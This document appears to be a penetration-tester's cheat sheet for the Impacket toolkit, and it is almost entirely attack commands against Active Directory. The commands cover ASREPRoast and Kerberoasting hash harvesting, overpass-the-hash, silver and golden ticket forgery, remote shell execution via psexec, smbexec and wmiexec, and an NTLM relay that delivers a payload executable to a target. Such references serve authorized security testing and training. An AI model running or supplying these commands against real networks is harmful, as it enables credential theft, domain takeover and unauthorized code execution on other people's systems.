Impacket#

Impacket is a Python class library for working with network protocols. It provides low-level programmatic access to packets, and for SMB1-3 and MSRPC it includes the protocol implementation itself. The operator runs Impacket scripts for Kerberos abuse, hash extraction, and remote command execution in Active Directory.

ASREPRoast#

GetNPUsers.py enumerates users with the DONT_REQUIRE_PREAUTH flag and harvests their pre-auth blobs for offline cracking.

# ASREPRoast for all domain users (credentials required)
$ python GetNPUsers.py <domain>/<user>:<password> -request \
    -format <hashcat | john> -outputfile <output_file>

# ASREPRoast for a list of users (no credentials required)
$ python GetNPUsers.py <domain>/ -usersfile <users_file> \
    -format <hashcat | john> -outputfile <output_file>

Kerberoasting#

GetUserSPNs.py harvests TGS tickets for SPN-bearing accounts.

$ python GetUserSPNs.py <domain>/<user>:<password> -outputfile <output_TGSs_file>

Overpass the hash, pass the key#

# Request the TGT with hash
$ python getTGT.py <domain>/<user> -hashes [lm_hash]:<ntlm_hash>

# Request the TGT with AES key
$ python getTGT.py <domain>/<user> -aesKey <aes_key>

# Request the TGT with password
$ python getTGT.py <domain>/<user>:[password]
# if not provided, password is requested

# Set the TGT for impacket use
$ export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with the TGT
$ python psexec.py  <domain>/<user>@<host> -k -no-pass
$ python smbexec.py <domain>/<user>@<host> -k -no-pass
$ python wmiexec.py <domain>/<user>@<host> -k -no-pass

Tickets#

Silver ticket.

# Generate TGS with NTLM
$ python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> \
    -domain <domain> -spn <service_spn> <user>

# Generate TGS with AES key
$ python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> \
    -domain <domain> -spn <service_spn> <user>

# Set the ticket for impacket use and execute remote commands
$ export KRB5CCNAME=<TGS_ccache_file>
$ python psexec.py  <domain>/<user>@<host> -k -no-pass
$ python smbexec.py <domain>/<user>@<host> -k -no-pass
$ python wmiexec.py <domain>/<user>@<host> -k -no-pass

Golden ticket.

# Generate TGT with NTLM
$ python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> \
    -domain <domain> <user>

# Generate TGT with AES key
$ python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> \
    -domain <domain> <user>

# Set the ticket for impacket use and execute remote commands
$ export KRB5CCNAME=<TGT_ccache_file>
$ python psexec.py  <domain>/<user>@<host> -k -no-pass
$ python smbexec.py <domain>/<user>@<host> -k -no-pass
$ python wmiexec.py <domain>/<user>@<host> -k -no-pass

NTLM relay, SMB to shell#

Turn off the SMB server on Responder by editing /etc/responder/Responder.conf.

$ echo '10.0.2.9' > targets.txt
$ ntlmrelayx.py -tf targets.txt ./payload.exe

References#